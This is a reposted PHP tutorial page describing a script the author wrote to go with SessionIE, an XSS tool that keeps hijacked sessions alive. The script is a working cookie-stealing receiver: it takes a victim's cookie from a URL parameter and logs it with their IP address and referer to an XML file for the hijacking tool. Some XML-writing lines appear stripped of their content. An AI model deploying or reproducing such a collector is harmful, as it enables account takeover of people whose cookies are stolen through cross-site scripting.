Maison > php教程 > php手册 > 配合XSS工具SessionIE的php脚本

配合XSS工具SessionIE的php脚本

WBOY
Libérer: 2016-06-13 10:22:07
original
1205 Les gens l'ont consulté

我写的这个纯粹是好玩,没啥意思,说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在 我们的邮件列表发布了一个新的xss利用工具,类似老外的hamster,在客户端定时刷新保持session不超时。被跨站的人只要访问一次之后,攻击 者就可以一直保持登陆的状态。他这个工具用.net做的,为了方便,要求收集cookie的脚本把cookie保存为xml文件。他提供了一个asp程 序,我只有php空间,因此写了个php的作测试用。
代码:

date_default_timezone_set("Asia/Chongqing");

$my_file = "cookie.xml";

if( ! isset( $_GET[x] ) )
{
     exit;
}

$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{
     if( ! file_exists( $my_file ) )
     {
         CreateXmlFile( );
     }
    
     AddData( $my_cookie );
}

function CreateXmlFile( )
{
     global $my_file;
    
     $fp = fopen( $my_file, "wb" );
     if( ! $fp )
     {
         exit;
     }
    
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, "
" );
     fwrite( $fp, "
" );
    
     fclose( $fp );
}

function AddData( $my_cookie )
{
     global $my_file;
    
     $doc = new DOMDocument( );
     $doc->load( $my_file );
     $doc->formatOutput = true;
    
     $treeroot = $doc->getElementsBytagName( "treeroot" )->item(0);
    
     $item = $doc->createElement( "item" );
     $treeroot->appendChild( $item );
    
     if( isset( $_SERVER["REMOTE_HOST"] ) )
     {
         $remote_host = $_SERVER["REMOTE_HOST"];
     }
     elseif( isset( $_SERVER["REMOTE_ADDR"] ) )
     {
         $remote_host = $_SERVER["REMOTE_ADDR"];
     }
     else
     {
         $remote_host = "NotCare";
     }
     $title = $doc->createElement( "title", $remote_host );
     $item->appendChild( $title );
    
     if( isset( $_SERVER["HTTP_REFERER"] ) )
     {
         $refer = $_SERVER["HTTP_REFERER"];
     }
     else
     {
         $refer = "http://yahoo.cn";
     }
     $link = $doc->createElement( "link", $refer );
     $item->appendChild( $link );
    
     $src_ip = $doc->createElement( "src_ip", $_SERVER["REMOTE_ADDR"] );
     $item->appendChild( $src_ip );
    
     $src_os = $doc->createElement( "src_os", "NotCare" );
     $item->appendChild( $src_os );
    
     $pubDate = $doc->createElement( "pubDate", date( "r" ) );
     $item->appendChild( $pubDate );
    
     $description = $doc->createElement( "description", $my_cookie );
     $item->appendChild( $description );
    
     $doc->save( $my_file );
}

?>

Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Recommandations populaires
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal